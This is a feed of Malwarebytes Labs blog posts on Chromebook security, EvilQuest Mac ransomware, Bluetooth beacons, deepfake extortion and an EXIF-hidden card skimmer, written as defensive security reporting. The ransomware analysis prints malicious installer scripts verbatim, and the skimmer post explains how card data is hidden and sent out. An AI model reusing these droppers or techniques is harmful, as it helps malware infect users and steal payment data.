Malware Bytes

Do Chromebooks need antivirus protection?

Malware Bytes Security - Wed, 07/01/2020 - 1:26pm

The supervisor handed Jim a Chromebook and said: “Take this home with you and use it to send me updates. We want to minimize the number of visits to the office—anything you can do from home helps keep this place safer. When the pandemic is over, I’d like to have it back in one piece, if possible.”

Jim is great at his job, but his reputation with technology skills is somewhat lacking. This should be an interesting experiment.

The Chromebook Jim’s supervisor hands him is a low-level laptop running ChromeOS. Because of the minimum hardware requirements for ChromeOS, these laptops are usually a lot cheaper than those running Windows or macOS. Bonus: Chromebooks are user-friendly, so folks with less technical savvy can still navigate with ease.

Not all jobs allow for working from home (WFH)—some have to visit clients or building sites. But for those who can, a Chromebook can be an ideal solution for employers to hand out. They are cheap, fast, and as long as you don’t need any complex or specific software to run on them, they can be used for any web-based and administrative tasks, such as reading and sending email, creating progress reports, and preparing information for the billing department.

Chromebook security

Chromebooks are supposed to come with sufficient, built-in security. But is that really true? Can you use a Chromebook without having to think twice about general cybersecurity and anti-malware protection in particular? Or do you need Chromebook antivirus? Let’s have a look first at which security features are pre-packed in ChromeOS.

The built-in security features of ChromeOS include:

  • Automatic updating: This is a good feature. No argument there. But it says nothing about the frequency of updates or about how fast updates will become available to counter zero-day vulnerabilities.
  • Sandboxing: Sandboxing is a method to limit the impact of an infection. The idea is that when you close an app or website, the related infection will be gone. While this might be true in most cases, it’s wishful thinking to believe malware authors would be unable to “escape” the sandbox.
  • Verified boot: This is a check done when the system starts up to verify that it hasn’t been tampered with. But this check does not work when the system is set to Developer Mode.
  • Encryption: This is an excellent feature that prevents criminals from retrieving data from a compromised, stolen or lost laptop, but it does not protect the system against malware.
  • Recovery: Recovery is an option that you can use to restore the Chromebook to a previous state. While this could get rid of malware, it might also delete important data in the process.

While Chromebooks have several built-in security features, none of them are full-proof. The danger is minimized by design, but any motivated cybercriminal could find their way around the checks put in place.

Additional Chromebook security risks

There are some additional arguments that could be made against using a Chromebook antivirus program. Chromebooks can download and run Android apps in emulated mode, which increases their security risk. But additional security protocols should prevent this feature from being exploited. These include the following:

  • The Play Store and Web Store both check the apps before they are admitted. While this may stop many blatant forms of malware, we find a fair amount of adware and potentially unwanted programs in these stores every day. And now and then, more malicious security threats make their way into the Play Store. And then there is the fact that many users will be tempted to install apps that are not available in the Play or Web Stores (yet).
  • Administrator permissions for malware are impossible to get on a Chromebook. While this is true, it does not mean that malware can’t get nasty without these permissions. As we have discussed in our blog on how Chromebooks can and do get infected, there are many examples of malware for Chromebooks that are annoying enough without the need to be elevated.
  • Chromebooks are not interesting for malware authors. Again, this may have been true at some point, but the more Chromebooks are out there, the bigger their target audience and the more appealing to focus on that group.

All in all, Chromebook virus protection may not be necessary yet, but there is plenty of malware going around that could ruin your Chromebook experience.

Beware of trusting the OS too much

As we have heard in the past (Macs don’t get infected!), some platforms have reputations for being safer even when the truth is the opposite. For example, this year, Mac malware outpaced Windows malware 2:1.

Windows machines still dominate the market share and tend to have more security vulnerabilities, which have for years made them the bigger and easier target for hackers. But as Apple’s computers have grown in popularity, hackers appear to be focusing more of their attention on the versions of macOS that power them. There is a good chance that with the growing popularity of ChromeOS-based systems, the same will happen in that field.

And the browser

And let’s not forget the weak spot of any OS: its browser. Just the other day, Google removed 106 extensions that were found spying on users. These extensions were all published by the same criminals and were found illegally collecting sensitive user data as part of a massive global surveillance campaign.

Awake Security, which disclosed the findings late last week, said the malicious browser add-ons were tied back to a single Internet domain registrar, GalComm.

This campaign and the Chrome extensions involved performed operations such as taking screenshots of the victim device, loading malware, reading the clipboard, and actively harvesting tokens and user input.

Our advice is that the malware out there today is obtrusive enough to warrant installing extra protection on any device, including a Chromebook. As Chromebooks gain in popularity, cybercriminals will look to profit from them, too. Better to be safe and prepared than to be caught asleep at the laptop.

Stay safe, everyone!

The post Do Chromebooks need antivirus protection? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New Mac ransomware spreading through piracy

Malware Bytes Security - Tue, 06/30/2020 - 12:09pm

A Twitter user going by the handle @beatsballert messaged me yesterday after learning of an apparently malicious Little Snitch installer available for download on a Russian forum dedicated to sharing torrent links. A post offered a torrent download for Little Snitch, and was soon followed by a number of comments that the download included malware.

RUTracker post showing magnet link to malicious installer Installation

Analysis of this installer showed that there was definitely something strange going on. To start, the legitimate Little Snitch installer is attractively and professionally packaged, with a well-made custom installer that is properly code signed. However, this installer was a simple Apple installer package with a generic icon. Worse, the installer package was pointlessly distributed inside a disk image file.

Malicious Little Snitch installer

Examining this installer revealed that it would install what turned out to be the legitimate Little Snitch installer and uninstaller apps, as well as an executable file named “patch”, into the /Users/Shared/ directory.

Files installed

The installer also contained a postinstall script—a shell script that is executed after the installation process is completed. It is normal for this type of installer to contain preinstall and/or postinstall scripts, for preparation and cleanup, but in this case the script was used to load the malware and then launch the legitimate Little Snitch installer.

!/bin/sh mkdir /Library/LittleSnitchd mv /Users/Shared/Utils/patch /Library/LittleSnitchd/CrashReporter rmdir /Users/Shared/Utils chmod +x /Library/LittleSnitchd/CrashReporter /Library/LittleSnitchd/CrashReporter open /Users/Shared/ &

The script moves the patch file into a location that appears to be related to LittleSnitch and renames it to CrashReporter. As there is a legitimate process that is part of macOS named Crash Reporter, this name will blend in reasonably well if seen in Activity Monitor. It then removes itself from the /Users/Shared/ folder and launches the new copy. Finally, it launches the Little Snitch installer.

In practice, this didn’t work very well. The malware got installed, but the attempt to run the Little Snitch installer got hung up indefinitely, until I eventually forced it to quit. Further, the malware didn’t actually start encrypting anything, despite the fact that I let it run for a while with some decoy documents in position as willing victims.

While waiting for the malware to do something—anything!—further investigation turned up an additional malicious installer, for some DJ software called Mixed In Key 8, as well as hints that a malicious Ableton Live installer also exists (although such an installer has not yet been found). There are undoubtedly other installers floating around as well that have not been seen.

The Mixed In Key installer turned out to be quite similar, though with slightly different file names and postinstall script.

!/bin/sh mkdir /Library/mixednkey mv /Applications/Utils/patch /Library/mixednkey/toolroomd rmdir /Application/Utils chmod +x /Library/mixednkey/toolroomd /Library/mixednkey/toolroomd &

This one did not include code to launch a legitimate installer, and simply dropped the Mixed In Key app into the Applications folder directly.


Once the infection was triggered by the installer, the malware began spreading itself quite liberally around the hard drive. Both variants installed copies of the patch file at the following locations:

/Library/AppQuest/ /Users/user/Library/AppQuest/ /private/var/root/Library/AppQuest/

It also set up persistence via launch agent and daemon plist files:

/Library/LaunchDaemons/ /Users/user/Library/LaunchAgents/ /private/var/root/Library/LaunchAgents/

The latter in each group of files, found in /private/var/root/, is likely to be due to a bug in the code that creates the files in the user folder, leading to creation of the files in the root user’s folder. Since it’s quite rare for anyone to actually log in as root, this doesn’t serve any practical purpose.

Strangely, the malware also copied itself to the following files:

/Users/user/Library/.ak5t3o0X2 /private/var/root/Library/.5tAxR3H3Y

The latter was identical to the original patch file, but the former was modified in a very strange way. It contained a copy of the patch file, with a second copy of the data from that file appended to the end, followed by an additional 9 bytes: the hexidecimal string 03705701 00CEFAAD DE. It is not yet known what the purpose of these files or this additional appended data is.

Even more bizarre—and still inexplicable—was the fact that the malware also modified the following files:

/Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/crashpad_handler /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/GoogleSoftwareUpdateDaemon /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksadmin /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksdiagnostics /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksfetch /Users/user/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/Helpers/ksinstall

These files are all executable files that are part of GoogleSoftwareUpdate, which are most commonly found installed due to having Google Chrome installed on the machine. These files had the content of the patch file prepended to them, which of course would mean that the malicious code would run when any of these files is executed. However, Chrome will see that the files have been modified, and will replace the modified files with clean copies as soon as it runs, so it’s unclear what the purpose here is.


The malware installed via the Mixed In Key installer was similarly reticent to start encrypting files for me. I left it running on a real machine for some time with no results, then started playing with the system clock. After setting it ahead three days, disconnecting from the network, and restarting the computer a couple times, it finally began encrypting files.

The malware wasn’t particularly smart about what files it encrypted, however. It appeared to encrypt a number of settings files and other data files, such as the keychain files. This resulted in an error message when logging in post-encryption.

Error displayed after the keychain was encrypted by the ransomware

There were other very obvious indications of error, such as the Dock resetting to its default appearance.

The Finder also began showing signs of trouble, with spinning beachballs frequently appearing when selecting an encrypted file. Other apps would also freeze periodically, but the Finder freezes could only be managed by force quitting the Finder.

Although others have reported that a file is created with instructions on paying the ransom, as well as an alert shown, and even text-to-speech used to inform the user they have been infected with ransomware, I was unable to duplicate any of these, despite waiting quite a while for the ransomware to finish.

Screenshot of encryption message posted to RUTracker forum Capabilities

The malware includes some anti-analysis techniques, found in functions named is_debugging and is_virtual_mchn. This is common with malware, as having a debugger attached to the process or being run inside a virtual machine are both indications that a malware researcher is analyzing it. In such cases, malware will typically not display its full capabilities.

In a blog post on Objective-See, Patrick Wardle outlined the details of how these two routines work. The is_virtual_mchn function actually does not appear to check to see if the malware is running in a virtual machine, but rather tries to catch a VM in the process of adjusting time. It’s not unusual for malware to include delays. For example, the first ever Mac ransomware, KeRanger, included a three day delay between when it infected the system and when it began encrypting files. This helps to disguise the source of the malware, as the malicious behavior may not be immediately associated with a program installed three days before.

This, plus the fact that the malware includes functions with names like ei_timer_create, ei_timer_start, and ei_timer_check, probably means that the malware runs on a time delay, although it’s not yet known what that delay is.

Patrick also points out that the malware appears to include a keylogger, due to presence of calls to CGEventTapCreate, which is a system routine that allows for monitoring of events like keystrokes. What the malware does with this capability is not known. It also opens a reverse shell to a command and control (C2) server.

Open questions

There are still a number of open questions that will be answered through further analysis. For example, what kind of encryption does this malware use? Is it secure, or will it be easy to crack (as in the case of decrypting files encrypted by the FindZip ransomware)? Will it be reversible, or is the encryption key never communicated back to the criminals behind it (also like FindZip)?

There’s still more to be learned, and we will update this post as more becomes known.


If you get infected with this malware, you’ll want to get rid of it as quickly as possible! Malwarebytes for Mac will detect this malware as Ransom.OSX.EvilQuest and remove it.

If your files get encrypted, we’re not sure how dire a situation that is. It depends on the encryption and how the keys are handled. It’s possible that further research could lead to a method for decrypting files, and it’s also possible that won’t happen.

The best way of avoiding the consequences of ransomware is to maintain a good set of backups. Keep at least two backup copies of all important data, and at least one should not be kept attached to your Mac at all times. (Ransomware may try to encrypt or damage backups on connected drives.)

I personally have multiple hard drives for backups. I use Time Machine to maintain a couple, and Carbon Copy Cloner to maintain a couple more. One of the backups is always in the safe deposit box at the bank, and I swap them periodically, so that worst case scenario, I always have reasonably recent data stored in a safe location.

If you have good backups, ransomware is no threat to you. At worst, you can simply erase the hard drive and restore from a clean backup. Plus, those backups also protect you against things like drive failure, theft, destruction of your device, etc.

Indicators of Compromise Files patch (and 5a024ffabefa6082031dccdb1e74a7fec9f60f257cd0b1ab0f698ba2a5baca6b Little Snitch 4.5.2.dmg f8d91b8798bd9d5d348beab33604a540e13ce40b88adc096c8f1b3311187e6fa Mixed In Key 8.dmg b34738e181a6119f23e930476ae949fc0c7c4ded6efa003019fa946c4e5b287a Network C2 server C2 address obtained from andrewka6.pythonanywhere[.]com

The post New Mac ransomware spreading through piracy appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Bluetooth beacons: one free privacy debate with your next order

Malware Bytes Security - Tue, 06/30/2020 - 11:00am

Apps and their permissions have been in the news recently, particularly in relation to tracking/privacy issues and Bluetooth. Why Bluetooth, though? What is it, and what is it doing to raise concerns in some security quarters?

Bluetooth: your cool, then uncool, but mostly cool again cousin

Bluetooth has had a slightly odd reputation down the years. Pre-smart phones, for many people it was “that thing enabled by default, which you can also use to transfer photographs incredibly slowly.” When smart phones came around, it was relegated to “that thing enabled by default, but I’ll turn it off because I have Wi-Fi.”

Bluetooth technology actually has a lot of applications. It’s a short-range wireless communications protocol which doesn’t deserve its occasionally uncool reputation. Its limited range stops it from killing your battery, and from a security standpoint, it’s quite tricky to deliberately attack someone’s mobile device when everything hinges on a target being in a small space at a specific time.

If you want to send contacts or videos to someone, tether devices, talk to people safely while in a car, or even just fire up some wire-free headphones in the gym without hassle, Bluetooth is the place to be. That’s not to say people can’t do bad things with it, of course.

Apple’s AirDrop, which made use of Bluetooth, was caught up in some unsolicited message chaos back in 2018. Bluejacking did similar things and has been around for a long time. Bluetooth isn’t 100 percent secure, but then nothing is. There are multiple steps you can take to lock Bluetooth down, with the caveat that it works best by being open and accessible most of the time.

However, security concerns about Bluetooth are being raised today in the realm of beacon technology.

What is beacon technology?

I’m glad you asked. You likely run into beacons every day without knowing it. For clarity’s sake, there are many beacon types and we’re not focusing on all of them here. Web beacons, which typically track you across websites or email, are interesting but not our focus here. We’re exploring the kind of beacon located in a store you happen to enter, or even just pass by inside a mall, which sees you coming and helps to serve up (say) some targeted advertising on a billboard or helps ad networks push said ads when you get home in your web browser.

We’ll look at what happens once you step inside the store in a little while, but first we need to figure out how to get you to roll up to my wonderland emporium in the first place. The unexpected first step involves a fence, but not the wooden kind.

Putting up a fence

Geofencing has been around for a good while, and you may have come into contact with it without realizing what it’s called. If you’ve read a more recent “What is this technology?” article, you’ll probably see lots of mentions of advertising, marketing, leading offers, customer satisfaction, and more. You’d assume it was some sort of marketing be-all and end-all, created by Steven P. Advertising, CEO of geolocational advertising services.

That’s not quite the case. 

Geofencing allows you to carve out virtual space around a real area. It’ll help prevent toddlers escaping from a nursery, or stop people wearing an ankle bracelet going on the run. It could alert workers in dangerous environments that they’ve wandered into the danger zone, or help businesses keep curious employees or intruders out of secure areas.

As you’ll be aware, some of this has been around seemingly forever. However, marketing and sales have adopted it as a major method for driving sales. If you go searching online, most of the primary results will be for slick marketing operation dot com as opposed oil rig platform safety dot net.

A trail of breadcrumbs

How do I let you know about my cool store if it’s quite a way off from your current location? I could throw up a chain of geofences along the roads you happen to be traveling down. As you pass through the geofenced area, you might start to receive mobile notifications about the awesome and very cheaply priced goods I’m selling.

Why not think bigger? I could geofence some digital billboards as you go driving past.

From your car, to my store: You may not have intended to pay me a visit when you set out this morning, but those adverts for…let’s say delicious sweet rolls…were too good an opportunity to pass up.

My selection of fences has brought you to the store, and now the in-house beacons will do the rest. Everything from your movement around the building to the products you linger on is now potentially up for grabs. But how do I send you some of those juicy beacon ads or follow you round the store like a digital ghost in the first place? How do I know if you’re lingering in front of my sweet rolls or walking on by to reach something more interesting?

The answer is: I need to introduce your mobile device to my good friend, Bluetooth McBeacon.

Bluetooth McBeacon: your new in-store guide

Well, what is a beacon? It’s most frequently a small, randomly shaped device. Could be a box, it might look like a router, or it could resemble one of those targets you strap to your chest in a game of laser tag. Put simply, it could be pretty much anything. It pulses out an ID and when a phone or other device recognises said ID, they’ll have a sales-based marketing conversation.

How to begin that sales-based marketing conversation?

The most common way for this to happen is to create an app, and include Bluetooth pairing as one of the permissions. If I’m strapped for cash or don’t know where to begin cobbling an app together, I don’t have to; there are multiple third-party apps out there which will pop your content via the beacon.

That’s the app part sorted out. My beacon device will make use of various protocols to howl its ID out into the void. Did you know Google made one of these protocols? How about Apple? It’s a whole new world of void howling.

Anyway, my beacon howls into the void at regular intervals—the shorter the better because it allows for more accurate tracking. When someone running the relevant mobile app wanders into the store, the beacon stops howling and starts hi-fiving as the mobile recognises the beacon ID. One quick permission request later, and we’re officially up and running with our previously mentioned sales-based marketing conversation.

The world is now our marketing oyster, and a barrage of targeted advertising, in-store offers, and even ads for objects you lingered in front of (but didn’t buy) will follow you home as a gentle reminder to maybe pick it up online at a discount. Depending on which ad platforms the beacon owner makes use of, they may be able to plug said platform directly into the beacon’s functionality, which would assist in even more detailed forms of tracking.

These techniques, combined with geofencing for maximum marketing impact, are how stores are pushing you to buy their stock and leading you to a marketing metrics bonanza behind the scenes.

There are many other forms of real-world ad pushing techniques, but in terms of Bluetooth and beacons, they’re a little more accessible and straightforward and this is probably why they’re so present in our everyday lives (even if we don’t realise it).

The future of Bluetooth tracking

Various attempts to make augmented reality shopping aids (dragging and dropping VR furniture into your room so you can see if it fits perfectly, waving your phone around to click on digital coupons as you pick up tins of soup, sales assistants knowing which product you hovered your phone over the longest) haven’t exactly exploded the way developers probably thought.

Nice ideas, but a little convoluted and often not practical. Dropping a router-like device in your store and asking people to download your app for some discounts instead? That is the way to go.

What can I do to avoid Bluetooth tracking?

Whether you’re not keen on election-related Bluetooth antics, or simply don’t want to be followed offline or otherwise by a growing collection of stores and malls, Bluetooth is easy to keep a handle on. Most phone models will have it as a default setting whenever you open your options menu, usually next to Wi-Fi. Don’t want Bluetooth doing its thing? Just turn it off.

If you desperately need to use Bluetooth for something specific, enable then disable right after. Keeping an eye on app permissions at install will help, and of course you should be in the habit of doing that anyway, and not just for Bluetooth. A huge range of apps ask for Bluetooth permissions, but that doesn’t necessarily mean they’re up to no good. As mentioned above, Bluetooth has a ton of valid uses, and even tech directly adjacent to it like ringfencing can be used for entirely useful purposes.

The trick is figuring out what the value proposition for the app is and knowing what its owners intend to do with your data once they have it. If you’re happy with their intentions, feel free to grant permission. If you’re unsure, save the install for another day and do some Internet sleuthing before making a commitment.

Because once your device and identity are plugged into an online/offline marketing profile, you may find it almost impossible to extract yourself. Perhaps it’s better to give that tempting-looking sweet roll store a pass.

The post Bluetooth beacons: one free privacy debate with your next order appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (June 22 – 28)

Malware Bytes Security - Mon, 06/29/2020 - 12:25pm

Last week on Malwarebytes Labs, we provided a zero-day guide for 2020 featuring recent attacks and advanced preventive techniques, and we learned how to cough in the face of scammers, offering security tips for the 2020 tax season. We also looked at a web skimmer hiding within EXIF metadata that was exfiltrating credit cards via image files.

In the most recent episode of our podcast Lock and Code, we talked to Matt Davey and Kyle Swank of 1Password about strengthening and forgetting passwords.

Other cybersecurity news
  • Google removed 106 extensions from its Chrome Web Store for collecting sensitive user data as part of a campaign targeting oil and gas, finance, and healthcare sectors. (Source: The Hacker News)
  • DDoSecrets has published BlueLeaks, data from over 200 police departments, law enforcement training, and support resources and fusion centers. (Source: ThreatPost)
  • A sophisticated and well-crafted attack campaign has been hitting unprepared organizations with Nefilim – aka Nephilim – ransomware. (Source: Gov Info Security)
  • An IBM survey found that newly-minted remote workers actually present a significant cybersecurity risk, without being at fault. (Source: IBM Security)
  • Billing information for some clients that was stored in a browser’s cache may have been compromised, Twitter said in an email to business clients. (Source: SC Magazine UK)
  • A European bank suffered the biggest PPS DDoS attack to date, and a new botnet is suspected to be behind the attack. (Source: Bleeping Computer)
  • Researchers discovered a new variant of Lucifer—a hybrid cryptojacking malware—involved in numerous incidents of CVE-2019-9081 exploitation in the wild. (Source: Palo Alto Networks)
  • An online engineer warned people to stay away from Tik-Tok after close investigation revealed intrusive user tracking and other issues. (Source: BoredPanda)
  • Nvidia released a set of security updates to remove vulnerabilities in the Nvidia GPU Display Driver. (Source: ZDNet)
  • Sodinokibi ransomware operators that claimed to have siphoned confidential docs on Nicki Minaj, Mariah Carey, and Lebron James from an American law firm are threatening to auction off the info. (Source: The Register)

Stay safe, everyone!

The post A week in security (June 22 – 28) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

The face of tomorrow’s cybercrime: Deepfake ransomware explained

Malware Bytes Security - Fri, 06/26/2020 - 1:24pm

While many countries are beginning to ease up on their respective pandemic lock downs—which, in turn, also means that everyone will soon ease into a life that is not quite post-COVID-19—we find ourselves once more on the cusp of change, an outlook that makes some feel anxious and others hopeful.

But for forward-looking security experts, there are some futures they dread and, frankly, would rather un-see. This is because, in the underground market and forums, there is sustained interest in ransomware and the surprisingly cheap offerings of deepfake services to match every cyber miscreant’s campaign of choice. Mash them together and what do you have? Deepfake ransomware.

Cybercrime waiting to happen

News about ransomware continues to be relevant, especially for businesses, its consistent targets. It seems that organizations of all sizes cannot cope, especially now that perimeters have been essentially decimated by remote work. And if you have been paying attention about how cybercrime gangs operate, they don’t keep using the same malicious tools for long. Most of the time, these tools evolve in time and with the crime.

So can you imagine a world where deepfake ransomware is a thing?

“Deepfake ransomware”? Never heard of it.

Granted that this compound word is quite new, the two terms it’s made of are not. But for the sake of review, let’s look at each of these terms so we can get an idea of how they could be related and why they could present a frightening future in cybercrime.

Deepfakes are the manipulation of media, may they be still images and/or videos accompanied by voice, using artificial intelligence (AI), resulting in a believable composite that is challenging to the naked eye and/or software. We’ve touched on the topic of deepfakes in several of our articles here on the Labs blog, including the possibility of such technology being used in scam campaigns.

Ransomware, on the other hand, is malware that holds the victim’s files hostage, either by encrypting important files or locking victims out of certain computer features to prevent them from performing remediation steps, until a ransom is paid.

Combining these two suggests that deepfake tech can be used in ransomware campaigns or vice versa. This is feasible, albeit a bit of a mindbender. To help us understand the concept behind this weird intermarriage, several experts in the field have given us examples of how this concept may look like in practice.

To the best of our knowledge, the term “deepfake ransomware” was first publicly coined by Paul Andrei Bricman, though he opted with a slightly different construction. A student at the University of Groningen specializing in AI and co-founder of not-for-profit REAL (Registrul Educațional Alternativ), he went with the portmanteau “RansomFake” instead, declaring it “the lovechild of ransomware and deepfake.”

Bricman defined RansomFake as “a type of malicious software that automatically generates fake video, which shows the victim performing an incriminatory or intimate action and threatens to distribute it unless a ransom is paid.” Bricman goes on to suggest that the threat actor behind such a campaign would offer up their targets the option to permanently delete the video file after payment is received.

If something like this can be automated, you can bet that more bad actors with little to no background in programming will take interest in such a technology. In a recent report from Trend Micro, it is revealed that there is great interest in how deepfakes could be used for sextortion (or what they call “eWhoring”) or for bypassing authentication protocols that rely on image verification when using certain sites, such as dating sites.

This report also considers deepfake ransomware an emerging threat because it takes extortion-based ransomware to the next level. The scenario they presented is like Bricman’s: threat actor scrapes videos and voice samples of their target from publicly available websites to create a deepfake video—but sprinkling in certain elements inspired from ransomware, such as a countdown timer that lasts for 24-48 hours.

Deepfake ransomware could also happen this way: A threat actor creates deepfake video of their target. Takes screenshots of this video and, pretending to be a legitimate contact of their target, sends them the screenshots and a link to the supposed video that they can watch themselves if they are in doubt.

Curious and perhaps half-convinced, half-scared, the target then clicks the link, gets redirected to the short clip of themselves in a compromising state and all the while, ransomware is being downloaded onto their system. Or, the link may not lead to a purported video after all but to the auto-downloading and execution of a ransomware file. Remember that deepfakes cannot just manipulate videos and voices but still images as well.

This is not an unlikely scenario. In fact, some ransomware threat actor(s) already used a similar tactic back in 2015.

Thankfully, this level of extortion hasn’t been seen in the wild (yet). Nonetheless, the potential for this campaign to destroy a target’s reputation is exceedingly high. It doesn’t really matter whether a video of someone is real or doctored to look real. As humans, we tend to believe what we see, because if you can’t trust your own eyes, what can you trust?

I’m not going to be a likely target, am I?

Never assume you’re not a target. Those who do—individuals, groups, and organizations alike—eventually find themselves at the receiving end of an attack. Worse—they’re not prepared for it. It’s always better to be safe now than sorry in the end.

Is there a way to protect against deepfake ransomware?

For this particular campaign, patching software for vulnerability holes is not needed—although you should be doing this religiously anyway.

A way to counter deepfake ransomware is at the beginning: Do not give cybercriminals the material they need to create something destructive and hold you responsible for. By this we mean watch what you post on social media in general: selfies, group pictures, TikTok videos, and other images are all up for grabs. You should think long and hard about who you’re sharing your content with and where.

Do an audit of your current photos and videos online and who has access to them. Weed out public-facing photos as much as you can or set them to be viewed by certain groups in your pool of contacts. If they’re not photos you posted yourself, simply un-tag yourself, or ask your contact to take them down.

Many call this process of “tidying up” data detoxing, and indeed, it is one of the handful of steps to keep your digital footprint as minimal as possible. This is not only good for your privacy but also for your pocket and sanity.

If you want to read more, Mozilla wrote about it not so long ago here.

When it comes to dealing with messages from people within your network, whether you personally know them or not, if you have other means to reach out to them other than social media platform, do so to verify two things: [a] Are they the person you’re really talking to?, and [b] If they are, did they actually send you those private messages about a purported video of you floating around the web that they found somewhere?

Furthermore, always be suspect of links, especially those purportedly sent by someone you know. Here’s the thing: people are less likely to believe a stranger who is just “being nice” than someone they may know personally and is concerned about them. Cybercriminals know this, too. And they will do whatever they can to make you believe the scammery they’re attempting to pull on you.

Lastly, backup your files. Always.

The post The face of tomorrow’s cybercrime: Deepfake ransomware explained appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files

Malware Bytes Security - Thu, 06/25/2020 - 1:28pm

They say a picture is worth a thousand words. Threat actors must have remembered that as they devised yet another way to hide their credit card skimmer in order to evade detection.

When we first investigated this campaign, we thought it may be another one of those favicon tricks, which we had described in a previous blog. However, it turned out to be different and even more devious.

We found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores. This scheme would not be complete without yet another interesting variation to exfiltrate stolen credit card data. Once again, criminals used the disguise of an image file to collect their loot.

During this research, we came across the source code for this skimmer which confirmed what we were seeing via client-side JavaScript. We also identified connections to other scripts based on various data points.

Skimmer hidden within EXIF metadata

The malicious code we detected was loaded from an online store running the WooCommerce plugin for WordPress. WooCommerce is increasingly being targeted by criminals, and for good reason, as it has a large market share.

Figure 1: Malwarebytes showing a web block on a merchant site

Malwarebytes was already blocking a malicious domain called cddn[.]site that was triggered upon visiting this merchant’s website. Upon closer inspection we found that extraneous code had been appended to a legitimate script hosted by the merchant.

The offending code loads a favicon file from cddn[.]site/favicon.ico which turns out to be the same favicon used by the compromised store (a logo of their brand). This is an artifact of skimming code that’s been observed publicly and that we refer to as Google loop.

Figure 2: Legitimate JavaScript library injected with additional code

However, nothing else so far from this code indicates any kind of web skimming activity. All we have is JavaScript that loads a remote favicon file and appears to parse some data as well.

This is where things get interesting. We can see a field called ‘Copyright’ from which data is getting loaded. Attackers are using the Copyright metadata field of this image to load their web skimmer. Using an EXIF viewer, we can now see JavaScript code has been injected:

Figure 3: Metadata viewer revealing JavaScript code inside the Copyright tag

The abuse of image headers to hide malicious code is not new, but this is the first time we witnessed it with a credit car skimmer.

The presence of an eval is a sign that code is meant to be executed. We can also see that the malware authors have obfuscated it. An archive of this script can be found here.

Figure 4: A portion of the malicious JavaScript hidden inside the EXIF data Skimmer exfiltrates data as an image

The initial malicious JavaScript (Figure 2) loads the skimming portion of the code from the favicon.ico (Figure 3) using an <img> tag, and specifically via the onerror event.

As with other skimmers, this one also grabs the content of the input fields where online shoppers are entering their name, billing address and credit card details. It encodes those using Base64 and then reverses that string.

Figure 5: Same code loaded via an img tag revealing how stolen data is exfiltrated

It comes with a twist though, as it sends the collected data as an image file, via a POST request, as seen below:

Figure 6: Example of a transaction that was grabbed by the skimmer

The threat actors probably decided to stick with the image theme to also conceal the exfiltrated data via the favicon.ico file.

Skimmer toolkit found in the open

We were able to get a copy of the skimmer toolkit’s source code which was zipped and exposed in the open directory of a compromised site. The gate.php file (also included in the zip) contains the skimmer’s entire logic, while other files are used as supporting libraries.

Figure 7: The skimmer toolkit, left on a hacked site and containing the PHP source files

This shows us how the favicon.ico file is crafted with the injected JavaScript inside of the Copyright field. There are some other interesting artifacts as well, such as the Cache HTTP header and Created date for the image.

Figure 8: PHP source showing how the EXIF data is injected

The JavaScript code for the skimmer is obfuscated using the WiseLoop PHP JS Obfuscator library, in line with what we saw on the client-side.

Figure 9: WiseLoop PHP and JS obfuscator Connections to other skimmers, Magecart group 9

Based on open source intelligence, we can find more details on how this skimmer may have evolved. An earlier version of this skimmer was found hosted at jqueryanalise[.]xyz (archive here). It lacks some obfuscation found in the more recent case we found, but the same core features, such as loading JavaScript via the Copyright field (metadata of an image file), exist.

Figure 10: Connecting skimmer domains and registrant emails

We also can connect this threat actor to another skimming script based on the registrant’s email (rotrnberg.s4715@gmail[.]com) for cddn[.]site. Two domains (cxizi[.]net and yzxi[.]net) share the same skimmer code which looks much more elaborate and does not appear to have much in common with the other two JavaScript pieces (archive here).

Figure 11: An artifact from the new skimmer

While debugging it, we can spot the string ‘ars’ within a URL path. That same string was seen being used in the first skimmer (see Figure), although it might very well just be a coincidence.

The data exfiltration is quite different too. While the content-type is an image again, this time we see a GET request where the stolen data is Base64 encoded only, and passed as a URL parameter instead.

Figure 12: Data exfiltration for this more advanced skimmer

Finally, this skimmer may have ties with Magecart Group 9. Security researcher @AffableKraut pointed out that a domain (magentorates[.]com) using this EXIF metadata skimming technique has the same Bulgarian host, same registrar, and was registered within a week of magerates[.]com.

Figure 13: A possible connection to Magecart group 9

Magerates[.]com is registered under, which also has other skimmer domains, and in particular several used via another clever evasion technique in the form of WebSockets. This type of skimmer was tied to Magecart Group 9, originally disclosed by Yonathan Klijnsma .

Tracking digital skimmers is not an easy task these days, as there are many threat actors and countless variations of skimming scripts based off toolkits or that are completely custom.

We continue to track and report skimmers in an effort to protect online shoppers from this campaign and dozens of others.

Indicators of Compromise

EXIF skimmers


Older EXIF skimmer


Skimmer #3


Other skimmers


Registrant emails


The post Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Coughing in the face of scammers: security tips for the 2020 tax season

Malware Bytes Security - Wed, 06/24/2020 - 10:30am

In spite of everything happening in the world right now—the 2020 tax season is about to come to an end, and taxes are due.

Americans got a reprieve back in March when the US Treasury Department and Internal Revenue Service (IRS) announced they were pushing back the federal income tax filing due date from April 15 to July 15, 2020. Fast forward three months and here we are, filing taxes during a worldwide health crisis and the most extreme social unrest the US has seen since the 1960s.

If only we could magically write off this entire year (like those Zoom calls with your therapist, aka “medical expenses”). And because time is relative, 2020 is absolutely the longest year in human history. Presidential election in November? I’ll die of old age before then.

While you’re preoccupied with, oh you know, avoiding serious illness and fighting for basic human rights, it’s business as usual for cybercriminals. Cybercrime tends to spike during tax season as scammers take advantage of all the valuable data floating around the Internet. These attacks follow a few tried and true methods, usually a phishing email or scam call from someone purporting to be from the IRS or an accountant offering to help you get a bigger refund.

